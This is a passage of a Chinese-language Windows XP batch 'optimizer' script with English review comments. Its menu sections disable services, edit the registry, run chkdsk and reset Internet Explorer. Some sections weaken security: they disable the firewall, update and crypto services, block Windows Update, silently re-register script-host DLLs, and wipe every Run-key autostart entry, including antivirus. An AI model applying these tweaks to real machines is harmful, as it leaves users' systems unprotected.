echo 您的操作系统是: Windows XP [未知类型 Service Pack或尚未安装]
goto :NO_XPSP
)
SET XPSP2=FALSE
cls
echo 您的操作系统是: Windows XP [Service Pack 1]
goto :NO_XPSP
)
SET XPSP2=TRUE
cls
echo 您的操作系统是: Windows XP [Service Pack 2]
goto :NO_XPSP
)
SET XPSP2=FALSE
cls
echo 您的操作系统是: Windows XP [Service Pack 3]
goto :NO_XPSP
)
SET XPSP2=FALSE
cls
echo 您的操作系统是: Windows XP [Service Pack 4]
goto :NO_XPSP
:OSXP64
rem Operating system identified (second variant): reached when "ver" reports version 5.2.3790.
set SYSTEM=xp
rem Look for Service Pack 2, then Service Pack 1, in an export of the CurrentVersion key.
rem Each "if errorlevel==1 (" opens the "not found" arm of the search just above it.
"%regedit%" /e "%TEMP%\~svclist.txt" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
type "%TEMP%\~svclist.txt"|"%find%" /i "Service Pack 2" >NUL
if errorlevel==1 (
type "%TEMP%\~svclist.txt"|"%find%" /i "Service Pack 1" >NUL
if errorlevel==1 (
SET XPSP2=FALSE
cls
echo 实验平台: Windows XP64 [未知类型 Service Pack或尚未安装]
goto NO_XPSP
)
SET XPSP2=FALSE
cls
echo 实验平台: Windows XP64 [Service Pack 1]
goto :NO_XPSP
)
SET XPSP2=TRUE
cls
echo 实验平台: Windows XP64 [Service Pack 2]
goto :NO_XPSP
:NO_XPSP
rem Remove the temporary export and continue with the environment report.
if exist "%TEMP%\~svclist.txt" del /F /Q "%TEMP%\~svclist.txt"
goto :CONTINUE
rem The two lines below follow an unconditional goto and are not reached.
pause>nul
cls
:CONTINUE
rem Print the environment report and return to the menu.
rem NOTE(review): the process-closing section of this script also defines a label spelled
rem ":continue"; confirm that every "goto :CONTINUE" reaches the label intended.
rem The find below goes through PATH rather than %find% and matches the Chinese caption for total
rem physical memory, so it presumably prints nothing on a system with another display language.
systeminfo|find "物理内存总量"
echo 系统当前时间: %date% %time%
echo 用户域 : %userdomain%
echo 操作系统内核 : %os%
echo 当前登陆用户 : %username%
echo 本地计算机名 : %computername%
echo 系统目录 : %windir%
echo 命令提示符相关参数 : %prompt%
echo 系统驱动盘符 : %systemdrive%
echo cpu标识信息 : %PROCESSOR_IDENTIFIER%
echo 安装程序指定目录 : %programfiles%
echo dos系统环境变量: %path%
echo 所有用户文件夹目录 : %ALLUSERSPROFILE%
echo 当前登陆用户文件夹 : %userprofile%
echo ===============================================================================
echo 请按任意键返回...
pause>nul
goto :_ControlCenter
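:_ServRestore
rem Menu option 16: import the snapshot file written earlier to undo the service changes.
rem The result message now depends on the outcome; the original printed the success text
rem even when the snapshot was missing or the import failed.
rem NOTE(review): the import writes back everything the snapshot file contains, so check what
rem was exported into it before relying on this option.
cls
title 系统服务优化恢复
echo.
if not exist "%root%\ServicesSet.reg.default" (
echo 恢复失败!
pause > nul
goto :_ControlCenter
)
echo 正在恢复已经优化的系统服务...
reg import "%root%\ServicesSet.reg.default"
if errorlevel 1 (
echo 恢复失败!
) else (
echo 恢复成功!
)
pause > nul
goto :_ControlCenter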
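:_ServConfig
rem Menu option 4: save the current service configuration, then set the start type of a fixed
rem list of services.
echo.
title 系统服务配置
cls
echo.
echo 此项目前只完成了单机服务配置,
echo 敬请关注最新消息,请按下"回车键"继续...
pause>nul
cls
echo.
echo 正在对系统服务进行全面快照,您可能需要
echo 等待一些时间,如果你的机器不理想的话...
rem The key name belongs on the regedit command line. In the listing it stood on a line of its
rem own, where regedit /e exports the whole registry and cmd then tries to run the key path
rem as a command.
rem NOTE(review): each run overwrites the snapshot, so after a second run the "default" file
rem already holds the changed settings.
"%regedit%" /e "%root%\ServicesSet.reg.default" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services"
cls
echo 系统服务状态备份完成!
rem Same services and start types as the original one-per-line list, grouped by start type.
rem NOTE(review): the DISABLED group contains services a host's security depends on:
rem SharedAccess (Windows Firewall/ICS on XP), wuauserv and BITS (updates), CryptSvc, PolicyAgent
rem (IPsec), ProtectedStorage, SamSs, seclogon, srservice (System Restore) and VSS. Review the
rem list against the machine's role before running it.
for %%S in (Alerter ALG AppMgmt BITS Browser CiSvc ClipSrv COMSysApp CryptSvc dmadmin dmserver Dnscache ERSvc FastUserSwitchingCompatibility helpsvc HidServ ImapiService lanmanserver lanmanworkstation LmHosts Messenger MSDTC NetDDE NetDDEdsdm Netlogon Nla PolicyAgent ProtectedStorage RasAuto RasMan RDSessMgr RemoteAccess RemoteRegistry RSVP SamSs SCardSvr Schedule seclogon SENS SharedAccess Spooler srservice SSDPSRV stisvc SwPrv SysmonLog TapiSrv TermService TlntSvr TrkWks upnphost UPS VSS W32Time WebClient WmiApSrv wuauserv WZCSVC) do sc config %%S start= DISABLED
for %%S in (AudioSrv DcomLaunch Dhcp Eventlog NtmsSvc PlugPlay RpcSs ShellHWDetection Themes winmgmt) do sc config %%S start= AUTO
for %%S in (EventSystem HTTPFilter MSIServer Netman NtLmSsp ose RpcLocator WmdmPmSN Wmi xmlprov) do sc config %%S start= DEMAND
cls
echo 服务配置完成请按"回车键"返回...
pause>nul
goto :_ControlCenter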
:_Optimize
rem Menu option 10: apply Explorer and Start-menu tweaks, partly with reg.exe and partly through
rem a generated .reg file, then remove several entries from the "New" context menu.
rem Menu display delay.
reg add "HKCU\Control Panel\Desktop" /v MenuShowDelay /t reg_sz /d 0 /f
rem Turn off the animation shown when a window is minimized.
reg add "HKCU\Control Panel\Desktop\WindowMetrics" /v MinAnimate /t reg_sz /d 0 /f
rem Do not show the "Shortcut to" text.
rem Do not show the small arrow on shortcuts.
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile" /v IsShortcut /f
rem Author's description: delete a shortcut directly when it is no longer valid.
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoResolveSearch /t reg_dword /d 1 /f
rem Use the classic Windows folder style.
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v WebView /t reg_dword /d 0 /f
rem Notepad: word wrap and status bar at the same time.
reg add "HKCU\software\microsoft\notepad" /v StatusBar /t reg_dword /d 00000001 /f
reg add "HKCU\software\microsoft\notepad" /v fWrap /t reg_dword /d 00000001 /f
rem Hide "My Music" in the Start menu.
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyMusic /t reg_dword /d 1 /f
rem Hide "My Pictures" in the Start menu.
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyPictures /t reg_dword /d 1 /f
rem
rem Generate the file 屏蔽.reg in the current directory, one echo per line.
rem NOTE(review): section headers in a .reg file normally use the full root key name
rem (HKEY_CURRENT_USER); confirm that regedit imports the abbreviated "HKCU" headers written
rem below at all.
rem NOTE(review): the generated file includes "NoWindowsUpdate"=1, which blocks the user's access
rem to Windows Update if the import takes effect.
echo Windows Registry Editor Version 5.00 > 屏蔽.reg
echo [HKCU\Control Panel\Desktop] >> 屏蔽.reg
echo ;菜单显示延迟 >> 屏蔽.reg
echo "MenuShowDelay"="0" >> 屏蔽.reg
echo [HKCU\Control Panel\Desktop\WindowMetrics] >> 屏蔽.reg
echo ;屏蔽窗口最小化时的动画效果 >> 屏蔽.reg
echo "MinAnimate"="0" >> 屏蔽.reg
echo [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer] >> 屏蔽.reg
echo ;不显示快捷方式字样 >> 屏蔽.reg
echo "link"=hex:00,00,00,00 >> 屏蔽.reg
echo [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced] >> 屏蔽.reg
echo ;不显示最近打开的文档 >> 屏蔽.reg
echo "Start_ShowRecentDocs"=dword:00000000 >> 屏蔽.reg
echo ;不显示控制面板 >> 屏蔽.reg
echo "Start_ShowControlPanel"=dword:00000000 >> 屏蔽.reg
echo ;不显示帮助 >> 屏蔽.reg
echo "Start_ShowHelp"=dword:00000000 >> 屏蔽.reg
echo ;不显示我的电脑 >> 屏蔽.reg
echo "Start_ShowMyComputer"=dword:00000000 >> 屏蔽.reg
echo ;不显示我的文档 >> 屏蔽.reg
echo "Start_ShowMyDocs"=dword:00000000 >> 屏蔽.reg
echo ;不显示我的音乐 >> 屏蔽.reg
echo "Start_ShowMyMusic"=dword:00000000 >> 屏蔽.reg
echo ;不显示我的图片 >> 屏蔽.reg
echo "Start_ShowMyPics"=dword:00000000 >> 屏蔽.reg
echo ;不显示网络连接 >> 屏蔽.reg
echo "Start_ShowNetConn"=dword:00000000 >> 屏蔽.reg
echo ;不显示打印和传真 >> 屏蔽.reg
echo "Start_ShowNetPlaces"=dword:00000000 >> 屏蔽.reg
echo [HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> 屏蔽.reg
echo ;禁止使用活动桌面 >> 屏蔽.reg
echo "NoActiveDesktop"=dword:00000001 >> 屏蔽.reg
echo ;不显示最近打开的文档 >> 屏蔽.reg
echo "NoRecentDocsMenu"=dword:00000001 >> 屏蔽.reg
echo ;禁止自动升级 >> 屏蔽.reg
echo "NoWindowsUpdate"=dword:00000001 >> 屏蔽.reg
echo ;禁用开始菜单中的常用的程序 >> 屏蔽.reg
echo "NoStartMenuMFUprogramsList"=dword:00000001 >> 屏蔽.reg
echo ;不显示我的文档-收藏夹 >> 屏蔽.reg
echo "NoFavoritesMenu"=dword:00000001 >> 屏蔽.reg
echo ;屏蔽磁盘不足的警告 >> 屏蔽.reg
echo "NoLowDiskSpaceChecks"=dword:00000001 >> 屏蔽.reg
echo ;关机时候自动清除最近打开的文档 >> 屏蔽.reg
echo "ClearRecentDocsOnExit"=dword:00000001 >> 屏蔽.reg
echo ;不显示我的文档记录 >> 屏蔽.reg
echo "NoRecentDocsHistory"=dword:00000001 >> 屏蔽.reg
echo ;不显示开始菜单中的帮助 >> 屏蔽.reg
echo "NoSMHelp"=dword:00000001 >> 屏蔽.reg
echo ;显示系统托盘的自定义图标,例如输入法 >> 屏蔽.reg
echo "NoToolbarsOnTaskbar"=dword:00000000 >> 屏蔽.reg
echo ;不显示网络邻居 >> 屏蔽.reg
echo "NoNetHood"=dword:00000000 >> 屏蔽.reg
echo ;不显示自定义任务栏 >> 屏蔽.reg
echo "NoToolbarCustomize"=dword:00000000 >> 屏蔽.reg
echo ;禁止在开始菜单显示 网上邻居 项 >> 屏蔽.reg
echo "NoStartMenuNetworkPlaces"=dword:00000001 >> 屏蔽.reg
echo ;禁止在开始菜单显示 图片收藏 项 >> 屏蔽.reg
echo "NoSMMyPictures"=dword:00000001 >> 屏蔽.reg
echo ;禁止在开始菜单显示 我的音乐 项 >> 屏蔽.reg
echo "NoStartMenuMyMusic"=dword:00000001 >> 屏蔽.reg
rem
rem Copy the generated file to %root% if it is not there yet, import the copy in the current
rem directory without a prompt, then delete the copy in %root%. The file in the current
rem directory is left in place.
if not exist "%root%"\屏蔽.reg copy /y 屏蔽.reg "%root%"
regedit.exe /s 屏蔽.reg
if exist "%root%"\屏蔽.reg del /q "%root%"\屏蔽.reg
rem
rem Clean up the context menu: remove the ShellNew keys of these file types.
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.AIS\ShellNew /f
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bfc\ShellNew /f
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bmp\ShellNew /f
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.doc\Word.Document.8\ShellNew /f
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.ppt\PowerPoint.Show.8\ShellNew /f
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.rar\ShellNew /f
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.wav\ShellNew /f
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.xls\Excel.Sheet.8\ShellNew /f
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.zip\ShellNew /f
cls
pause
goto :_ControlCenter
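:_CheckDisk
rem Menu option 13: ask for a drive and for the repair options, then run chkdsk with them.
rem Variables set here live inside setlocal/endlocal and are dropped when the section ends.
rem NOTE(review): the drive answer is passed to chkdsk.exe exactly as typed.
cls
@echo off
rem chkdsk.cmd
title 磁盘检测程序
setlocal
echo.
echo 磁盘检测程序已经启动
set _drive=
set _r=
set _f=
set _s=
set _param=
echo 请输入驱动器的盘符,卷标名或者装入点...
set /p _drive=输入驱动盘符:
if "%_drive%" == "" goto _end
echo.
echo 你想修复磁盘上的错误和损坏的坏扇区
echo 并恢复可读取的数据吗?(是/否)...
:_recinp
echo "Y" 即 “是”
echo "N" 即 “否”
set /p _r=(请输入你的选择):
if "%_r%" == "" goto _recinp
if /I "%_r%" == "y" goto _chk_summary
if /I "%_r%" == "n" goto _fix
goto _recinp
:_fix
echo.
echo 你想修复磁盘上的错误 (是/否)...
:_fixinp
set /p _f=(请输入你的选择):
if /I "%_f%" == "" goto _fixinp
if /I "%_f%" == "y" goto _chk_summary
if /I "%_f%" == "n" goto _chk_summary
rem An invalid answer repeats this question; the original jumped back to the previous one.
goto _fixinp
rem This label was ":_go" in the original, the same name as a label near the start of the
rem script; it is renamed so that the jumps above cannot land on the other one.
:_chk_summary
echo.
echo ----------------------------------------------------------------
echo 你已经指明检查的 %_drive% 驱动器/卷
echo.
echo 应用了以下选项:
if /I "%_r%" == "y" goto _pfix
if /I "%_f%" == "y" goto _pfix
goto _nofix
:_pfix
echo - 修复磁盘上的错误
:_nofix
if /I "%_r%" == "y" echo - 修复损坏的坏扇区并恢复可读取的数据 (较慢!)
echo ----------------------------------------------------------------
echo.
echo 启动磁盘检测? (是/否)...
:_startinp
set /p _s=(请输入你的选择):
if /I "%_s%" == "" goto _startinp
if /I "%_s%" == "y" goto _run
if /I "%_s%" == "n" goto _abort
goto _startinp
:_run
rem /r takes precedence over /f when both answers are "y".
if /I "%_f%" == "y" set _param=/f
if /I "%_r%" == "y" set _param=/r
set _param=%_drive% %_param%
echo 正在运行: chkdsk.exe %_param%
chkdsk.exe %_param%
echo.
echo CHKDSK.CMD: 磁盘检测完成...
goto _end
:_abort
echo.
echo CHKDSK.CMD: 终止...
:_end
rem Wait before clearing the screen; the original cleared it first, which wiped the chkdsk
rem output before the user could read it.
pause
endlocal
cls
goto :_ControlCenter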
:_drive_rascal_software_away
rem ================================================================
rem Browser-hijack recovery section. It does three things in order:
rem   1. two rundll32 calls against advpack.dll naming dacui.dll
rem      and icatalog.mdb,
rem   2. a long series of silent regsvr32 registrations,
rem   3. generation and silent import of a .reg file that resets
rem      Internet Explorer title, home page, search and policy
rem      values, followed by a jump back to the control center.
rem Everything runs silently, so a failed step is never reported.
rem ================================================================
cls
title 流氓软件劫持的相关恢复
echo.
echo 此项"流氓软件劫持恢复"以注册表修复为主.
echo.
echo 正在修复系统,请稍等...
echo.
echo.
rem NOTE(review): presumably meant to delete the two named files.
rem The usual rundll32 form is dll-comma-entrypoint, so confirm
rem that this slash form does anything at all.
rundll32.exe advpack.dll /DelNodeRunDLL32 "%systemroot%\System32"\dacui.dll
rundll32.exe advpack.dll /DelNodeRunDLL32 "%systemroot%\Catroot"\icatalog.mdb
rem The regsvr32 variable is defined outside this section. Each call
rem below is silent. The list includes the script-host components
rem wshom.ocx, wshext.dll, vbscript.dll, jscript.dll, scrobj.dll and
rem scrrun.dll, so on a machine where those were unregistered on
rem purpose as hardening, this section puts them back.
"%regsvr32%" /s setupwbv.dll
"%regsvr32%" /s wininet.dll
"%regsvr32%" /s comcat.dll
"%regsvr32%" /s shdoc401.dll
"%regsvr32%" /s shdoc401.dll /i
"%regsvr32%" /s asctrls.ocx
"%regsvr32%" /s oleaut32.dll
"%regsvr32%" /s shdocvw.dll /I
"%regsvr32%" /s shdocvw.dll
"%regsvr32%" /s browseui.dll
"%regsvr32%" /s browseui.dll /I
"%regsvr32%" /s msrating.dll
"%regsvr32%" /s mlang.dll
"%regsvr32%" /s hlink.dll
"%regsvr32%" /s mshtml.dll
"%regsvr32%" /s mshtmled.dll
"%regsvr32%" /s urlmon.dll
"%regsvr32%" /s plugin.ocx
"%regsvr32%" /s sendmail.dll
"%regsvr32%" /s comctl32.dll /i
"%regsvr32%" /s inetcpl.cpl /i
"%regsvr32%" /s mshtml.dll /i
"%regsvr32%" /s scrobj.dll
"%regsvr32%" /s mmefxe.ocx
rem NOTE(review): the next line looks like two commands merged into
rem one, a registration of proctexe.ocx and a separate mshta.exe
rem call. As written, mshta.exe and its switch are passed to
rem regsvr32 as extra arguments. Confirm against the original script.
"%regsvr32%" /s proctexe.ocx mshta.exe /register
"%regsvr32%" /s corpol.dll
"%regsvr32%" /s jscript.dll
"%regsvr32%" /s msxml.dll
"%regsvr32%" /s imgutil.dll
"%regsvr32%" /s thumbvw.dll
"%regsvr32%" /s cryptext.dll
"%regsvr32%" /s rsabase.dll
"%regsvr32%" /s triedit.dll
"%regsvr32%" /s dhtmled.ocx
"%regsvr32%" /s inseng.dll
"%regsvr32%" /s iesetup.dll /i
"%regsvr32%" /s hmmapi.dll
"%regsvr32%" /s cryptdlg.dll
"%regsvr32%" /s actxprxy.dll
"%regsvr32%" /s dispex.dll
"%regsvr32%" /s occache.dll
"%regsvr32%" /s occache.dll /i
"%regsvr32%" /s iepeers.dll
"%regsvr32%" /s wininet.dll /i
"%regsvr32%" /s urlmon.dll /i
"%regsvr32%" /s digest.dll /i
"%regsvr32%" /s cdfview.dll
"%regsvr32%" /s webcheck.dll
"%regsvr32%" /s mobsync.dll
"%regsvr32%" /s pngfilt.dll
"%regsvr32%" /s licmgr10.dll
"%regsvr32%" /s icmfilter.dll
"%regsvr32%" /s hhctrl.ocx
"%regsvr32%" /s inetcfg.dll
"%regsvr32%" /s trialoc.dll
"%regsvr32%" /s tdc.ocx
"%regsvr32%" /s MSR2C.DLL
"%regsvr32%" /s msident.dll
"%regsvr32%" /s msieftp.dll
"%regsvr32%" /s xmsconf.ocx
"%regsvr32%" /s ils.dll
"%regsvr32%" /s msoeacct.dll
"%regsvr32%" /s wab32.dll
"%regsvr32%" /s wabimp.dll
"%regsvr32%" /s wabfind.dll
"%regsvr32%" /s oemiglib.dll
"%regsvr32%" /s directdb.dll
"%regsvr32%" /s inetcomm.dll
"%regsvr32%" /s msoe.dll
"%regsvr32%" /s oeimport.dll
"%regsvr32%" /s msdxm.ocx
"%regsvr32%" /s dxmasf.dll
"%regsvr32%" /s laprxy.dll
"%regsvr32%" /s l3codecx.ax
"%regsvr32%" /s acelpdec.ax
"%regsvr32%" /s mpg4ds32.ax
"%regsvr32%" /s voxmsdec.ax
"%regsvr32%" /s danim.dll
"%regsvr32%" /s Daxctle.ocx
"%regsvr32%" /s lmrt.dll
"%regsvr32%" /s datime.dll
"%regsvr32%" /s dxtrans.dll
"%regsvr32%" /s dxtmsft.dll
"%regsvr32%" /s vgx.dll
"%regsvr32%" /s WEBPOST.DLL
"%regsvr32%" /s WPWIZDLL.DLL
"%regsvr32%" /s POSTWPP.DLL
"%regsvr32%" /s CRSWPP.DLL
"%regsvr32%" /s FTPWPP.DLL
"%regsvr32%" /s FPWPP.DLL
"%regsvr32%" /s FLUPL.OCX
"%regsvr32%" /s wshom.ocx
"%regsvr32%" /s wshext.dll
"%regsvr32%" /s vbscript.dll
rem NOTE(review): same merged-line pattern as above. mstinit.exe
rem and its switch end up as regsvr32 arguments here.
"%regsvr32%" /s scrrun.dll mstinit.exe /setup
"%regsvr32%" /s msnsspc.dll /SspcCreateSspiReg
"%regsvr32%" /s msapsspc.dll /SspcCreateSspiReg
rem Generate the file IE受篡改的恢复.reg in the current directory.
rem The first echo truncates any existing file of that name; the
rem lines starting with a semicolon are comments inside the .reg
rem file itself and are part of the generated output.
echo Windows Registry Editor Version 5.00 > IE受篡改的恢复.reg
echo ;IE受篡改的相关注册表恢复 >> IE受篡改的恢复.reg
echo ;申明:以下的修改结果可能并不会另所有人 >> IE受篡改的恢复.reg
echo ;满意,但是以下的都是恢复注册表最初的数据 >> IE受篡改的恢复.reg
rem Window title, machine-wide and for the current user.
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main] >> IE受篡改的恢复.reg
echo ;(系统所有用户)IE标题恢复 >> IE受篡改的恢复.reg
echo "Window Title"="Microsoft Internet Explorer" >> IE受篡改的恢复.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main] >> IE受篡改的恢复.reg
echo ;(当前用户)IE标题恢复 >> IE受篡改的恢复.reg
echo "Window Title"="Microsoft Internet Explorer" >> IE受篡改的恢复.reg
rem Default page URL is set to about:blank.
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main] >> IE受篡改的恢复.reg
echo ;IE的默认页面被篡改,默认情况下为空,即下面的 about:blank >> IE受篡改的恢复.reg
echo "Default_Page_URL"="about:blank" >> IE受篡改的恢复.reg
rem NOTE(review): the three dword values below are written under
rem the Main key of the current user; the generated comment
rem describes them as lock settings, so confirm that this is the
rem key that actually carries those locks.
echo [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main] >> IE受篡改的恢复.reg
echo ;修改了IE浏览器缺省主页,并且锁定设置项,禁止用户更改 >> IE受篡改的恢复.reg
echo "Settings"=dword:00000000 >> IE受篡改的恢复.reg
echo "Links"=dword:00000000 >> IE受篡改的恢复.reg
echo "SecAddSites"=dword:00000000 >> IE受篡改的恢复.reg
rem A section header with a leading minus deletes the whole key;
rem the plain header after it recreates the key empty. This drops
rem every context-menu extension of the current user.
echo ;IE右键菜单被修改 >> IE受篡改的恢复.reg
echo [-HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt] >> IE受篡改的恢复.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt] >> IE受篡改的恢复.reg
rem The Search key is deleted and rebuilt twice in a row; only the
rem values written after the second delete survive the import.
echo ;IE默认搜索引擎被修改 >> IE受篡改的恢复.reg
echo [-HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search] >> IE受篡改的恢复.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search] >> IE受篡改的恢复.reg
echo "CustomizeSearch"="http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchcust.htm" >> IE受篡改的恢复.reg
echo [-HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search] >> IE受篡改的恢复.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search] >> IE受篡改的恢复.reg
echo "SearchAssistant"="http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchcust.htm" >> IE受篡改的恢复.reg
echo "CustomizeSearch"="http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchcust.htm" >> IE受篡改的恢复.reg
rem Deletes the per-user Restrictions policy key outright.
echo ;查看“源文件”菜单被禁用 >> IE受篡改的恢复.reg
echo [-HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions] >> IE受篡改的恢复.reg
rem NOTE(review): the Winlogon header below is followed by no
rem values, so it changes nothing beyond naming the key.
echo ;系统启动时弹出对话框 >> IE受篡改的恢复.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon] >> IE受篡改的恢复.reg
rem Start page is set to about:blank machine-wide and per user.
echo ;IE默认连接首页被修改 >> IE受篡改的恢复.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main] >> IE受篡改的恢复.reg
echo "Start Page"="about:blank" >> IE受篡改的恢复.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main] >> IE受篡改的恢复.reg
echo "Start Page"="about:blank" >> IE受篡改的恢复.reg
rem Recreates the Restrictions key deleted above with the context
rem menu restriction switched off.
echo ;IE中鼠标右键失效 >> IE受篡改的恢复.reg
echo [HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions] >> IE受篡改的恢复.reg
echo "NoBrowserContextMenu"=dword:00000000 >> IE受篡改的恢复.reg
rem End of generating IE受篡改的恢复.reg
rem The file is copied into the root directory only when no copy
rem exists there, imported silently from the current directory,
rem and then the root copy is deleted. The copy in the current
rem directory is left behind.
if not exist "%root%"\IE受篡改的恢复.reg copy /y IE受篡改的恢复.reg "%root%"
regedit.exe /s IE受篡改的恢复.reg
if exist "%root%"\IE受篡改的恢复.reg del /q "%root%"\IE受篡改的恢复.reg
cls
echo 修复完毕!
pause
cls
goto :_ControlCenter
:_CommandLine
rem Opens a nested interactive cmd.exe for the operator. The nested
rem shell inherits this script's environment and privileges. Once
rem the operator types exit, the script changes to the Windows
rem directory and returns to the control center.
cls
title 考拉版命令提示符
echo 考拉版命令提示符
echo.
echo ...想要返回请输入 exit
cmd /k
chdir "%systemroot%"
cls
goto :_ControlCenter
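:_SartUpItemSpeedUp
rem ================================================================
rem Startup speed-up section. It strips autostart entries from the
rem registry and the Startup folders, then imports a generated .reg
rem file, and finally returns to the control center.
rem Security impact: every value under both Run keys is deleted,
rem which also removes the autostart entries of antivirus and other
rem protection software, as the window title itself warns. No
rem backup is taken, so the change cannot be undone from here.
rem NOTE(review): export the Run keys before running this section
rem if the previous state must be recoverable.
rem ================================================================
cls
title 启动提度--此项可能会关闭你随机启动的杀毒软件等其他安全防护软件
echo.
echo 正在进行系统提速配置....
rem Fixed: the Program Files path contains a space, so unquoted it
rem split into two tokens and the test never worked.
if exist "%programfiles%\Real\RealPlayer\rpau3260.dll" regsvr32 /u /s "%programfiles%\Real\RealPlayer\rpau3260.dll"
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /va /f
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /va /f
rem Put ctfmon back after the wipe. Fixed: the path used a
rem hard-coded Windows directory on drive C, and without the force
rem switch reg add could stop at an overwrite prompt if the delete
rem above had failed.
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v ctfmon.exe /d "%systemroot%\system32\ctfmon.exe" /f
rem The original listed this delete twice. NOTE(review): the second
rem copy may have been meant for a different MSConfig subkey.
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg" /f
rem Empty the Startup folders for all users, the default user and
rem the current user. The folder names are the localized ones from
rem a Chinese Windows installation, and the default-user path is
rem fixed to drive C.
if exist "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\*.*" del "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\*.*" /q /f
if exist "C:\Documents and Settings\Default User\「开始」菜单\程序\启动\*.*" del "C:\Documents and Settings\Default User\「开始」菜单\程序\启动\*.*" /q /f
if exist "%userprofile%\「开始」菜单\程序\启动\*.*" del "%userprofile%\「开始」菜单\程序\启动\*.*" /q /f
reg add "HKCU\Console" /v LoadConIme /t reg_dword /d 1 /f
rem
rem Generate 启动提速.reg in the current directory. It blanks the
rem per-user Startup shell folder value, locks the taskbar and
rem switches the prefetcher off in ControlSet001 and in the
rem current control set.
echo Windows Registry Editor Version 5.00 >启动提速.reg
echo ;启动项 >>启动提速.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders] >>启动提速.reg
echo "Startup"="" >>启动提速.reg
echo ;锁定任务栏 >>启动提速.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >>启动提速.reg
echo "LockTaskbar"=dword:00000001 >>启动提速.reg
echo ;取消开机预读取 >>启动提速.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Memory Management] >>启动提速.reg
echo "EnablePrefetcher"=dword:00000000 >>启动提速.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management] >>启动提速.reg
echo "EnablePrefetcher"=dword:00000000 >>启动提速.reg
rem
rem Copy into the root directory only when no copy exists there,
rem import silently, then delete the copy in the current directory.
rem The copy in the root directory stays behind.
if not exist "%root%"\启动提速.reg copy /y 启动提速.reg "%root%"
regedit.exe /s 启动提速.reg
if exist 启动提速.reg del /q 启动提速.reg
pause
cls
goto :_ControlCenter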
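:_QUIT_
:{
rem Farewell screen. Prints the author banner, waits for Enter,
rem then inspects the process list for explorer.exe and hands over
rem to the exit section. The brace labels only mark the section.
cls
echo 猫 猫
echo 猫猫 猫猫 鄙人尚未学习编程,
echo 猫 猫 猫 猫 请不要用专业的眼光来
echo 猫 猫 猫 猫 猫 猫 评估此脚本的实用性。
echo 猫 猫猫猫猫猫 猫 如果你发现脚本运行
echo 猫 猫 中的Bug(缺陷),欢迎致
echo 猫 猫 电指点,本人定当学以
echo 猫 ▲ ▲ 猫 致用。
echo 猫 猫
echo ---猫 猫 --- 谢谢您支持此脚本!!
echo - -猫- __ V __ -猫--
echo. --- 猫 猫 --- 作者: koala
echo. 猫猫猫猫猫 QQ:13019940
echo.
echo.
echo 咨询平台: http://loveskoala.blogspot.com
echo ________________________________________________________
echo.
echo 我是抱着猫打完这段乱七八糟的东西的.
echo * _ *
echo ________________________________________________________
echo [请按任意键退出]
echo ------------------------------------------------------
echo.
rem Fixed: the original had a space before the equals sign, which
rem cleared a variable whose name ends in a space and left QUIT
rem itself untouched.
set "QUIT="
rem The prompt above says any key, but set /p only returns on Enter.
set /p QUIT=
rem
rem The process variable names an external tool defined outside
rem this section; its output is captured and searched for
rem explorer.exe.
"%process%" > "%root%\processlist.txt"
type "%root%\processlist.txt"|"%find%" /i "explorer.exe" >NUl
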